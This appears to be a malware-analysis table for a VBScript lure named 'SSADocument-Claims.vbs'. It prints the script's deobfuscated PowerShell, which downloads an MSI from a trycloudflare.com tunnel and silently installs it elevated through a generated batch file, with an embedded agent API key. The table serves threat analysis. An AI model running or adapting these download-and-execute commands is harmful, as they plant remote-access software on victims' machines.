| Name | Value | Verdict | Location |
|---|---|---|---|
| URLs in VB Code - #1 | https://blessed-welfare-accessible-explanation.trycloudflare.com/dashboard/bs/bs/sutp.msi | | SSADocument-Claims.vbs |
| Deobfuscated PowerShell | [ServicePointManager]::"SecurityProtocol" = [SecurityProtocolType]::"Tls12" Invoke-WebRequest -Uri "https://blessed-welfare-accessible-explanation.trycloudflare.com/dashboard/bs/bs/sutp.msi" -OutFile "%WORKDIR%\setup.msi" | Malicious | SSADocument-Claims.vbs > SSADocument-Claims.vbs.deobfuscated.vbs > [Command #0] > [PowerShell Command] |
| Deobfuscated PowerShell | ""[[Unmanaged(ErrorExpressionAst)] [] net.servicepointmanager]::securityprotocol=[net.securityprotocoltype]::tls12 Invoke-WebRequest -Uri "https://blessed-welfare-accessible-explanation.trycloudflare.com/dashboard/bs/bs/sutp.msi" -OutFile "%WORKDIR%\setup.msi" "" batFile.WriteLine " "echo" "Installing" "setup" "Agent..." "%WORKDIR%\step.log" batFile.WriteLine start" "/wait" "msiexec" "/i" "" "%WORKDIR%\setup.msi" "LEVEL_API_KEY=jGzD3XaLXB4djKMCtnJN8sKk" "/qn" "/log" "" "%WORKDIR%\install.log" batFile.WriteLine echo" "Done" "%WORKDIR%\step.log" batFile.WriteLine exit" "/b" "0 batFile.Close CreateObject(Shell.Application).ShellExecute batPath, ", ", runas, 0" | Malicious | SSADocument-Claims.vbs > [PowerShell Command] |